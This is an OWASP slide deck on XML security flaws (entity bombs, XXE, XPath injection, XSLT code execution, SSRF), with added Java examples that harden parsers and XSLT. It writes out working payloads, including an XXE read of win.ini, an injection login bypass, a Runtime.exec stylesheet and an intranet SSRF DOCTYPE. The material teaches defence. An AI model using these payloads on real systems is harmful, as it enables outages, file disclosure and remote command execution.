
XML Attack Surface - Pierre Ernst (OWASP Ottawa)


Description: XML processing security vulnerabilities and how to avoid them.


Page 1: XML Attack Surface - Pierre Ernst (OWASP Ottawa)

OWASP

Pierre Ernst, 2013

XML Attack Surface

Business Analytics Security Competency Group

Page 2

XML is Pervasive

Page 3

XML intro

■ Born in 1998 (see initial specifications)
■ Data interchange format
  – International languages support
  – Text based
  – Human readable
■ Parsers
  – DOM
  – SAX, rooted in Ottawa (see bio)
  – StAX
■ Complementary technologies and standards
  – XML Validation (DTD, XSD, ...)
  – XML Transformation (XSLT)
  – XML Query (XQuery, XPath)

Page 4

Is XML Secure?

■ Nothing wrong with the standard itself
■ Most vulnerabilities due to
  – Libraries/Tools misconfiguration
  – Insufficient validation of untrusted input
■ known, reported security vulnerabilities (see CVE search)

Page 5

XML Bomb

■ CWE-776: Denial of service (memory exhaustion)
■ Amit Klein, 2002 (see BugTraq)
■ XML entity expansion

<!DOCTYPE ibm [
  <!ENTITY ernst128 "pierre">
  <!ENTITY ernst127 "&ernst128;&ernst128;">
  ...
  <!ENTITY ernst002 "&ernst003;&ernst003;">
  <!ENTITY ernst001 "&ernst002;&ernst002;">
  <!ENTITY ernst000 "&ernst001;&ernst001;">
]>
<ibm>&ernst000;</ibm>

Page 6

Modus Operandi

1. Attacker → Vulnerable Server:
   POST /request HTTP/1.1

   <ibm>&ernst000;</ibm>

2. The vulnerable server expands the entities, doubling at every level:
   <ibm>&ernst001;&ernst001;</ibm>
   <ibm>&ernst002;&ernst002;&ernst002;&ernst002;</ibm>
   <ibm>&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;&ernst003;</ibm>
   ...

Page 7

Demo #1: Server Crash with XML Bomb

(Source code available on demand)

Page 8

Variation: “Quadratic Blowup Attack”

■ Amit Klein (see MSDN article)
■ Uses one single entity of size 50KB
■ Reference the entity 50,000 times
■ Useful to bypass FEATURE_SECURE_PROCESSING protection
  – Limits entity expansions to
    • 100,000 (IBM)
    • 64,000 (Oracle)

<!DOCTYPE pierre [
  <!ENTITY e "eeeeeeeeeeee...eeeeeeeee">
]>
<pierre>&e;&e;&e;...&e;&e;&e;</pierre>

Page 9

Protection

DOM, SAX:
  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

StAX:
  factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);

Page 10

External Entity Reference (XXE)

■ CWE-611: Information Disclosure
■ Gregory Steuck, 2002 (see BugTraq)
■ Requires the server to include user-supplied data in the response

<!DOCTYPE pierre [
  <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
]>
<pierre>&ernst;</pierre>

Page 11

Modus Operandi

1. Attacker → Vulnerable Server:
   POST /request HTTP/1.1

   <pierre>&ernst;</pierre>

2. The vulnerable server resolves the external entity:
   <pierre>[... content of the file on the server...]</pierre>

3. Vulnerable Server → Attacker:
   HTTP/1.1 200 OK
   Content-Type: text/xml

   <response> Unknown service [... content of the file on the server...]</response>

Page 12

Demo #2: File Content Disclosure with XXE

(Source code available on demand)

Page 13

Protection

DOM, SAX:
  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

StAX:
  factory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);

Page 14

Blind Xpath Injection (“XML Injection”)

■ CWE-643: Abuse of Functionality
■ Amit Klein, 2004 (see white-paper)
■ User input is embedded as-is in Xpath statement

<users>
  <user>
    <name>pierre</name>
    <password>i8simon</password>
  </user>
  <user>
    <name>trevor</name>
    <password>mee2</password>
  </user>
</users>

Legitimate login (form input: pierre / ***********):
//users/user[name/text()='pierre' and password/text()='i8simon']/name/text()

Injected login (form input: ' or ''=' / ***********):
//users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()

Page 15

Modus Operandi

1. Attacker → Vulnerable Server:
   POST /login HTTP/1.1

2. The vulnerable server evaluates:
   //users/user[name/text()='' or ''='' and password/text()='' or ''='']/name/text()

3. Vulnerable Server → Attacker:
   HTTP/1.1 200 OK
   Content-Type: text/html

   pierre trevor

Page 16

Demo #3: Blind Xpath Injection

(Source code available on demand)

Page 17

Variation: Read System Properties

■ JAXP implementation:
  – IBM
  – Oracle
■ Interesting properties:
  – os.version
  – user.name
  – java.class.path
  – sun.java.command

system-property('sun.java.command')

Page 18

Protection

■ Input Validation.
■ “[A-Za-z0-9_\-]+” in our example.
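Added example (not code from the slides): the login query of pages 14 and 15 written twice in Java, once with the input concatenated into the XPath string as the slides describe, and once hardened with the allow-list pattern from this slide plus XPath variables bound through a `XPathVariableResolver`, so user input can never become part of the expression. The user document is constructed inline from the data on page 14; the JDK's built-in XPath engine and Java 8 or later are assumed.

```java
import java.io.StringReader;
import java.util.HashMap;
import java.util.Map;
import java.util.regex.Pattern;

import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.xpath.XPath;
import javax.xml.xpath.XPathFactory;

import org.w3c.dom.Document;
import org.xml.sax.InputSource;

public final class SafeXPathLogin {

    // Allow-list from the Protection slide: letters, digits, underscore, hyphen.
    private static final Pattern ALLOWED = Pattern.compile("[A-Za-z0-9_\\-]+");

    // Same user store as page 14, constructed inline so the example runs stand-alone.
    private static final String USERS =
        "<users>"
        + "<user><name>pierre</name><password>i8simon</password></user>"
        + "<user><name>trevor</name><password>mee2</password></user>"
        + "</users>";

    private final Document doc;

    public SafeXPathLogin() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        doc = f.newDocumentBuilder().parse(new InputSource(new StringReader(USERS)));
    }

    // The vulnerable shape from the slides: input is glued into the query text,
    // so a quote in the input changes the structure of the predicate.
    public String loginUnsafe(String name, String password) throws Exception {
        String q = "//users/user[name/text()='" + name + "' and password/text()='"
                 + password + "']/name/text()";
        return XPathFactory.newInstance().newXPath().evaluate(q, doc);
    }

    // Hardened: reject anything outside the allow-list, then pass the values as
    // XPath variables. The expression text is a constant; $name and $password are
    // compared as plain strings whatever characters they contain.
    public String loginSafe(String name, String password) throws Exception {
        if (!ALLOWED.matcher(name).matches() || !ALLOWED.matcher(password).matches()) {
            return ""; // invalid input: no query is built at all
        }
        Map<String, String> vars = new HashMap<>();
        vars.put("name", name);
        vars.put("password", password);
        XPath xp = XPathFactory.newInstance().newXPath();
        xp.setXPathVariableResolver(v -> vars.get(v.getLocalPart()));
        return xp.evaluate(
            "//users/user[name/text()=$name and password/text()=$password]/name/text()", doc);
    }

    public static void main(String[] args) throws Exception {
        SafeXPathLogin app = new SafeXPathLogin();
        String injected = "' or ''='"; // the page-14 input
        System.out.println("unsafe, real credentials: " + app.loginUnsafe("pierre", "i8simon"));
        System.out.println("unsafe, injected input:   " + app.loginUnsafe(injected, injected));
        System.out.println("safe, real credentials:   " + app.loginSafe("pierre", "i8simon"));
        System.out.println("safe, injected input:     '" + app.loginSafe(injected, injected) + "'");
    }
}
```

With the unsafe method the injected input turns the predicate into `'' or ''='' and ... or ''=''`, which is true for every user, so the first name in document order comes back; the safe method returns an empty string before touching the document, and even without the allow-list the variable binding would compare the literal text `' or ''='` against the name element.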

Page 19

Code Injection during XSLT

■ CWE-94: Improper Control of Generation of Code
■ When the attacker can control the XML style sheet applied to an XML document.
■ Uses transformer engine extension capabilities

<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:rt="xalan://java.lang.Runtime"
    exclude-result-prefixes="rt">
  <xsl:template match="/">
    <xsl:variable name="obj" select="rt:getRuntime()"/>
    <xsl:value-of select="rt:exec($obj,'calc.exe')"/>
  </xsl:template>
</xsl:stylesheet>

Page 20

Modus Operandi

1. Attacker → Vulnerable Server:
   GET /request?doc=...&stylesheet=... HTTP/1.1

   <doc>whatever</doc>
   <stylesheet>malicious</stylesheet>

2. Vulnerable Server: Load class java.lang.Runtime

3. Vulnerable Server: Call exec() method

Page 21

Demo #4: Remote OS Command Injection

(Source code available on demand)

Page 22

Variation #1: Universal XXE

<!DOCTYPE xsl:stylesheet [
  <!ENTITY ernst SYSTEM "file:///c:/windows/win.ini">
]>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template match="/"> &ernst; </xsl:template>
</xsl:stylesheet>

● “Universal”: you always see the entity in the response

Page 23

Variation #2: Infinite Loop

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
  <xsl:template name="loop">
    <xsl:call-template name="loop"/>
  </xsl:template>
  <xsl:template match="/">
    <xsl:call-template name="loop"/>
  </xsl:template>
</xsl:stylesheet>

Page 24

Variation #3: Cross-Site Scripting (XSS)

<xsl:stylesheet version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:xhtml="http://www.w3.org/1999/xhtml">
  <xsl:output method="html"/>
  <xsl:template match="/">
    <xhtml:script>alert('XSS');</xhtml:script>
  </xsl:template>
</xsl:stylesheet>

Page 25

Protection

■ Several ways to abuse XML Stylesheet Transforms.
■ Users should never be able to use custom XML stylesheets.
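Added example (not code from the slides) of how a server can follow this slide's rule: the request only names a stylesheet from a fixed, server-controlled set, and the `TransformerFactory` is hardened as defence in depth with `FEATURE_SECURE_PROCESSING` (which makes the JDK's XSLTC refuse extension functions such as the `xalan://` Java bridge used on page 19) and the JAXP 1.5 `ACCESS_EXTERNAL_*` attributes (which stop the processor fetching external DTDs or imported stylesheets, the Universal XXE and SSRF vectors). The trusted stylesheet and the hostile test stylesheet are constructed inline; a JDK of 7u40 or later with its built-in XSLT processor is assumed.

```java
import java.io.StringReader;
import java.io.StringWriter;
import java.util.HashMap;
import java.util.Map;

import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;

public final class HardenedXslt {

    // The only stylesheets the server will ever apply, keyed by a short name.
    // Constructed inline for the example; a real service would load them from a
    // read-only location at startup, never from the request.
    private static final Map<String, String> TRUSTED = new HashMap<>();
    static {
        TRUSTED.put("plain",
            "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">"
            + "<xsl:output method=\"text\"/>"
            + "<xsl:template match=\"/\"><xsl:value-of select=\"/doc\"/></xsl:template>"
            + "</xsl:stylesheet>");
    }

    // Defence in depth for the transformer itself.
    public static TransformerFactory factory() throws TransformerException {
        TransformerFactory tf = TransformerFactory.newInstance();
        // Disables extension functions/elements in the JDK processor.
        tf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // Empty protocol list: no external DTDs, no xsl:import/xsl:include/document() fetches.
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");
        tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, "");
        return tf;
    }

    // The client chooses a name; the stylesheet text never comes from the client.
    public static String transform(String doc, String stylesheetName) throws TransformerException {
        String xsl = TRUSTED.get(stylesheetName);
        if (xsl == null) {
            throw new IllegalArgumentException("unknown stylesheet: " + stylesheetName);
        }
        Transformer t = factory().newTransformer(new StreamSource(new StringReader(xsl)));
        StringWriter out = new StringWriter();
        t.transform(new StreamSource(new StringReader(doc)), new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) throws Exception {
        System.out.println("trusted stylesheet: " + transform("<doc>whatever</doc>", "plain"));

        // Constructed hostile stylesheet: same Java-bridge mechanism as page 19, but
        // calling a harmless static method. With the hardened factory the processor
        // rejects the extension call instead of executing it.
        String hostile =
            "<xsl:stylesheet version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
            + " xmlns:sys=\"xalan://java.lang.System\">"
            + "<xsl:template match=\"/\">"
            + "<xsl:value-of select=\"sys:getProperty('java.version')\"/>"
            + "</xsl:template></xsl:stylesheet>";
        try {
            Transformer t = factory().newTransformer(new StreamSource(new StringReader(hostile)));
            StringWriter out = new StringWriter();
            t.transform(new StreamSource(new StringReader("<doc/>")), new StreamResult(out));
            System.out.println("extension call ran, factory is NOT hardened: " + out);
        } catch (TransformerException e) {
            System.out.println("extension call blocked: " + e.getMessage());
        }
    }
}
```

Depending on the JDK version the rejection surfaces either at `newTransformer` (compile time) or at `transform`; both are `TransformerException`s, so the catch covers either. The allow-list in `transform` is the real control from the slide; the factory settings only limit the damage if that control is ever bypassed.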

Page 26

Server Side Request Forgery (SSRF)

■ CWE-601: Open Redirect, but server-to-server
■ {Nathan Hamiel, Shawn Moyer}, 2009 (ShmooCon)
■ XML vectors:
  – Xml eXternal Entities (XXE)
  – Xinclude
  – External Doctype inclusion:

<!DOCTYPE PIERRE PUBLIC "ernst" "http://intranet:666/start-armageddon">
<pierre/>

Page 27

Modus Operandi

1. Attacker → Vulnerable Server:
   POST /request HTTP/1.1
   Content-Type: application/xml
   Content-Length: 666

   <?xml version="1.0"?>...

2. Vulnerable Server → Internal Service: whatever

Page 28

Protection

DOM, SAX:
  factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);

StAX:
  factory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
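Added example (not code from the slides) that puts the one-liners from the Protection slides on pages 9, 13 and 28 into one place: a hardened factory for each of the three parser APIs of page 3, then a run against a constructed document carrying both an internal entity and an external `SYSTEM` entity. The settings shown on the slides are the ones that matter (`disallow-doctype-decl` for DOM and SAX, `SUPPORT_DTD` and `IS_REPLACING_ENTITY_REFERENCES` for StAX); the extra SAX feature URIs and `XMLConstants.FEATURE_SECURE_PROCESSING` are standard belt-and-braces settings added here as an assumption of the JDK's built-in Xerces-derived parsers, which honour the `apache.org` feature namespace.

```java
import java.io.ByteArrayInputStream;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;

import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.SAXParserFactory;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

public final class HardenedXmlFactories {

    private static final String DISALLOW_DOCTYPE =
        "http://apache.org/xml/features/disallow-doctype-decl";
    private static final String EXT_GENERAL = "http://xml.org/sax/features/external-general-entities";
    private static final String EXT_PARAM = "http://xml.org/sax/features/external-parameter-entities";

    // DOM: any DOCTYPE is rejected before a single entity is declared, which closes
    // the XML bomb, quadratic blowup, XXE and external-DOCTYPE SSRF cases at once.
    public static DocumentBuilderFactory dom() throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        f.setFeature(DISALLOW_DOCTYPE, true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature(EXT_GENERAL, false);
        f.setFeature(EXT_PARAM, false);
        f.setXIncludeAware(false);          // XInclude is the other SSRF vector on page 26
        f.setExpandEntityReferences(false);
        return f;
    }

    // SAX: same feature set, applied to the parser factory.
    public static SAXParserFactory sax() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(DISALLOW_DOCTYPE, true);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature(EXT_GENERAL, false);
        f.setFeature(EXT_PARAM, false);
        f.setXIncludeAware(false);
        return f;
    }

    // StAX has no disallow-doctype feature. SUPPORT_DTD=false tells the reader to
    // ignore the DTD, IS_REPLACING_ENTITY_REFERENCES=false stops expansion, and
    // IS_SUPPORTING_EXTERNAL_ENTITIES=false refuses SYSTEM/PUBLIC fetches.
    public static XMLInputFactory stax() {
        XMLInputFactory f = XMLInputFactory.newInstance();
        f.setProperty(XMLInputFactory.SUPPORT_DTD, false);
        f.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
        f.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
        return f;
    }

    // Constructed sample: one internal entity, one external entity pointing at a
    // placeholder path. Nothing here is ever fetched by the hardened parsers.
    static final String SAMPLE =
        "<!DOCTYPE d [<!ENTITY a \"aaaa\"><!ENTITY x SYSTEM \"file:///example/secret.txt\">]>"
        + "<d>&a;&x;</d>";

    static InputStream sample() {
        return new ByteArrayInputStream(SAMPLE.getBytes(StandardCharsets.UTF_8));
    }

    public static void main(String[] args) throws Exception {
        try {
            dom().newDocumentBuilder().parse(sample());
            System.out.println("DOM: parsed (factory NOT hardened)");
        } catch (SAXParseException e) {
            System.out.println("DOM rejected DOCTYPE: " + e.getMessage());
        }
        try {
            sax().newSAXParser().parse(sample(), new DefaultHandler());
            System.out.println("SAX: parsed (factory NOT hardened)");
        } catch (SAXParseException e) {
            System.out.println("SAX rejected DOCTYPE: " + e.getMessage());
        }
        try {
            XMLStreamReader r = stax().createXMLStreamReader(sample());
            while (r.hasNext()) {
                // With replacement off, &a; and &x; surface as ENTITY_REFERENCE events
                // rather than being expanded or fetched.
                r.next();
            }
            System.out.println("StAX: read without expanding or resolving entities");
        } catch (XMLStreamException e) {
            System.out.println("StAX rejected input: " + e.getMessage());
        }
    }
}
```

The DOM and SAX branches fail fast on the DOCTYPE itself, which is the behaviour the Conclusions slide asks for: the client never gets to define the grammar of the request. StAX implementations differ in whether an undeclared reference with `SUPPORT_DTD=false` throws or is passed through as an event; either outcome is acceptable for a defender, since neither expands nor fetches anything.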

Page 29

Variation: Exotic Java URL Handlers

■ {Alexander Polyakov, Dmitry Chastukhin, Alexey Tyurin}, 2012 (CVE-2012-5085)

Page 30

Conclusions

■ Always configure your XML parsers to disallow Doctype.
  – From a server's perspective, clients should not be able to define the grammar of the request anyway
  – Secure Processing Flag is not enough
  – Preventing external entity expansion is not enough
■ XPath: validate user's input
■ XSLT: avoid at any cost
■ Always apply Java patches from vendors

Page 31

Pierre Ernst

■ 10 years as Software Developer
■ 5 years as Penetration Tester
  – 750+ vulns
  – Manual Code Review
  – Manual Black Box Testing
  – Java, XML, Open Source, …

https://twitter.com/e_rnst
http://ca.linkedin.com/in/pernst
[email protected]

Page 32

Questions & Answers